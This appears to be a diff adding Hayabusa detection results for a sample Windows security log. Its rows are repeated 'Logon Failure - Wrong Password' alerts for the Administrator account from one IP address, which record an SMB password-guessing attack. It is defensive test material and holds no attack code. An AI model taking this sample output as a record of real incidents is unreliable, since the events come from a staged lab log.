+2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4TdkChjMAviJ6jr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPIGU1rBk0F5cG9P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ScynGWKK3CtoUsi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0E4JAuxC8MuuGfnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4aDJtqsUWKyuDqBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yCFrEHUgqCtKPybS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ftrEBfaLGbboV8D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: thle3slH6gZYllyQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PcEnabS7oj98WI0e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EBqGp9CD4A9PsyLk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iil8dQlzMCkKRNUb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nDBqxF9bmNNjNdsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJNBRV3BRVEN8hmG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OGl1Tbdw7PDvVsRR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uspHTc4JwnjjZQti | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Exq3nfy1LeFOPcA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:22.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vdFC4g7vsLO0zOzL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HpdCohLheoqQ6DXw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHS3sclMwgHuH8rE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.100 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sNSheImuQwgOEH5g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GX5y374mlYYXbAB2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eaFRL6q9KQY5bFHZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.230 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrkEyJmfLiSrvQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.261 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fd1vJiJa3pdjqdQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RVrZl3LOIa7VLhT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TKR8KbyQkwRX1qTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GY22XuDxbE5lvEra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4AntiX3j9HLHcOOq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XIvMbod41WeNADy5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0UL4lb3CCrv7YfGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OyRktDjPqFyrdSTQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKEGmAH8Wbc7f3jC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06Dfi4lO2Vdw3gCr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 29eXmenUTACkAHKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Zq7Gl6hnKDJJqFc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jKENlWYt6m78taZR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.863 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 822SUU2Hg6w6AqQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bROU0Mk9Z4yEq323 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:23.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKfVPleDpLLqkuKq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NGWVqbchMitnLVYT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.086 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7K9vifU9lWwpP9J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIgKYj210JfICJXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jisuKilPQivTV8yE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hckyoom0XnqpRzK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: De0l6qgcuhMERjMY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.343 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SSa7pylPWn8jl2Ox | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.377 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ol9OntO4hqidlNUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kXOBF0ZWLxMauHuT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WVBFJltkR5vnmpYD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.554 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kHVXEHq9zNYdfTpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OIw3BxmLsfwDXXFg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.647 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hhgRhjnhkRJus4fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xz78guWXrekEvuFT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 04wNT26RJmriQrfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XmbuuymdSpfNldt2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.837 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yqJarBVOImq5Tn2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BZYExQroYH65tPuG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: llU5DQBrIrV3VtG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HV17iXOYQqs2ntax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:24.994 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esZnEeyGdPa22PsL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rlYFTP9a2wdi5A2n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.075 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJifU0PnO1Ntp6z3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGKdKjJy28Qd1whT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3L4BYjYJYlvuYHE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.206 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ui5RoLKttDo0wfFJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G2xjdWobsxBjo6p7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TPeQ0M5lXITI84G3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uu72qx4lG5ZRM7xf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zD072YR1hIgbzjaT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqA7HDvImIlCiFq2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: efYFxZwMGEC3vVi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.552 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6WmMHYegvFJvv6zd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DS9WkRnP0B5MgaeX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y5jNPV7ZgFExgg9n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
